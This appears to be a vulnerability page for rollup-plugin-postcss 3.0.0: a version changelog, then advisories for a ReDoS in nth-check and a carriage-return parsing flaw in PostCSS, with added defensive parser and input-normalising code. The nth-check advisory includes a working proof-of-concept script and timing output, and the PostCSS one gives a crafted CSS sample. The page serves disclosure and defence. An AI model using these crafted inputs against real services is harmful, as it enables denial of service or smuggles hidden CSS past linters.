Rollup Plugin PostCSS streamlines the integration of PostCSS into Rollup workflows, enabling developers to effortlessly leverage PostCSS's transformations and optimizations within their JavaScript bundling process. Version 3.0.0 introduces subtle yet impactful changes compared to its predecessor, version 2.9.0. While the core functionality remains consistent, a key difference lies in the updated dependency versions. Specifically, the resolve dependency is bumped from version 1.16.0 to 1.16.1. Additionally, the rollup dependency in devDependencies moves from version 1.32.1 to version 2.6.1.
This upgrade to Rollup v2 offers potential benefits, including improved performance and access to the latest features and bug fixes within the Rollup ecosystem. The change in resolve might address specific module resolution issues or introduce minor performance enhancements. Developers should also note that the file count and unpacked size differ in the newer release.
Both versions provide a seamless pathway for incorporating PostCSS features like autoprefixing, CSS Modules, and advanced transformations into Rollup-based projects. The plugin supports various CSS preprocessors like Less, Sass (node-sass), Stylus, and SugarSS, offering flexibility in styling choices. With dependencies like cssnano, it is possible to minify the final generated CSS. By using Rollup Plugin PostCSS, developers can write modern CSS and rely on Rollup to handle the bundling and optimization process. This simplifies asset management and improves the overall performance of web applications built with Rollup.
All vulnerabilities related to version 3.0.0 of the package
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerability in the regex is mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be triggered with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for (var i = 1; i <= 50000; i++) {
    var time = Date.now();
    var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
    try {
        nthCheck.parse(attack_str)
    }
    catch (err) {
        var time_cost = Date.now() - time;
        console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
    }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
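The pattern above is slow because the \s* runs can be split in many ways between the optional group and its surroundings, so the engine backtracks over every split before giving up. As an added illustration that is not part of the original advisory and not nth-check's own code, the following single-pass scanner for the CSS An+B microsyntax consumes each character exactly once, so the crafted shape from the proof of concept ('2n' followed by a long run of spaces and '!') is rejected in linear time. The accepted grammar is an assumption based on the CSS Selectors An+B syntax, and the names parseNth and isValidNth are this example's own.

```javascript
// Added example (not nth-check's code): a single-pass parser for the CSS
// An+B microsyntax ("odd", "even", "5", "2n+1", "-n + 3", "+3n").
// It never backtracks, so a run of whitespace costs O(length), not O(length^2).
// Returns [a, b] for an expression a*n + b, or throws SyntaxError.
function parseNth(input) {
  const s = String(input).trim().toLowerCase();
  if (s === 'even') return [2, 0];
  if (s === 'odd') return [2, 1];

  const n = s.length;
  let i = 0;
  const isDigit = (c) => c >= '0' && c <= '9';
  const isWs = (c) => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';
  const skipWs = () => { while (i < n && isWs(s[i])) i++; };
  // Reads a run of digits starting at i; returns null if there are none.
  const readInt = () => {
    const start = i;
    while (i < n && isDigit(s[i])) i++;
    return i > start ? Number(s.slice(start, i)) : null;
  };

  // Optional sign on the first term ("+3n", "-n", "-2").
  let sign = 1;
  if (s[i] === '+') i++;
  else if (s[i] === '-') { sign = -1; i++; }

  const digits = readInt();
  let a;
  let b;
  if (s[i] === 'n') {
    // "an" form: a missing coefficient means 1 ("n", "-n").
    i++;
    a = sign * (digits === null ? 1 : digits);
    skipWs();
    if (i === n) return [a, 0];
    const op = s[i];
    if (op !== '+' && op !== '-') {
      throw new SyntaxError(`Unexpected '${op}' at position ${i}`);
    }
    i++;
    skipWs();
    const bDigits = readInt();
    if (bDigits === null) throw new SyntaxError('Expected integer after sign');
    b = op === '-' ? -bDigits : bDigits;
  } else {
    // Plain integer form ("5", "+5", "-5").
    if (digits === null) throw new SyntaxError('Expected integer or "n"');
    a = 0;
    b = sign * digits;
  }
  if (i !== n) throw new SyntaxError(`Unexpected trailing input at position ${i}`);
  return [a, b];
}

// Convenience wrapper for validating untrusted input without exceptions.
function isValidNth(input) {
  try { parseNth(input); return true; } catch (e) { return false; }
}

// Stand-alone demonstration using the advisory's crafted shape
// ('2n' + many spaces + '!'); the input is constructed here, not captured.
if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  const crafted = '2n' + ' '.repeat(500000) + '!';
  const t0 = Date.now();
  const ok = isValidNth(crafted);
  console.log(`valid=${ok} length=${crafted.length} took=${Date.now() - t0} ms`);
  console.log(parseNth('2n + 1'), parseNth('-n+3'), parseNth('odd'));
}
```

The practical point for a defender is that parsing cost stays proportional to input length whatever the input looks like; the fix shipped in nth-check took the same route of removing the ambiguous quantifier structure, and upgrading is still the correct remediation for the bundled dependency.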
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contain parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
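As an added example that is not from PostCSS and not part of this page's source: where untrusted CSS has to be fed to a PostCSS older than 8.4.31, a pre-processing step that flags bare carriage returns and normalises every line ending to \n removes the \r ambiguity the sample above depends on, and the count of bare \r characters is a useful signal to log or reject on. The function names and the constructed sample are this example's own assumptions; upgrading to 8.4.31 is still the remediation.

```javascript
// Added example (not PostCSS's code): pre-processing for untrusted CSS.
// A bare '\r' (a carriage return not followed by '\n') is the character the
// advisory's sample relies on, so it is detected here and every line ending
// is normalised to '\n' before the text reaches a parser.

// Returns the 0-based offsets of every bare carriage return in the input.
function findBareCarriageReturns(css) {
  const offsets = [];
  for (let i = 0; i < css.length; i++) {
    if (css[i] === '\r' && css[i + 1] !== '\n') offsets.push(i);
  }
  return offsets;
}

// Converts CRLF and bare CR to LF so the parser sees one newline convention.
function normalizeLineEndings(css) {
  return css.replace(/\r\n?/g, '\n');
}

// Wraps both steps: returns the normalised text plus a small report that a
// linter or ingestion pipeline can log, alert on, or use to reject the input.
function prepareUntrustedCss(css) {
  const bareCr = findBareCarriageReturns(css);
  return {
    css: normalizeLineEndings(css),
    bareCrCount: bareCr.length,
    bareCrOffsets: bareCr,
  };
}

// Constructed sample shaped like the advisory's snippet; the '\r' before
// '/*' is the part that older PostCSS tokenised inconsistently.
const SAMPLE = '@font-face{ font:(\r/*);}\nbody { color: red }';

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  const report = prepareUntrustedCss(SAMPLE);
  console.log(`bare CR count: ${report.bareCrCount} at offsets ${report.bareCrOffsets}`);
  console.log(JSON.stringify(report.css));
}
```

Normalising is deliberately done after detection so the report still reflects what the untrusted source actually contained, which is the value an incident responder wants to see in the logs.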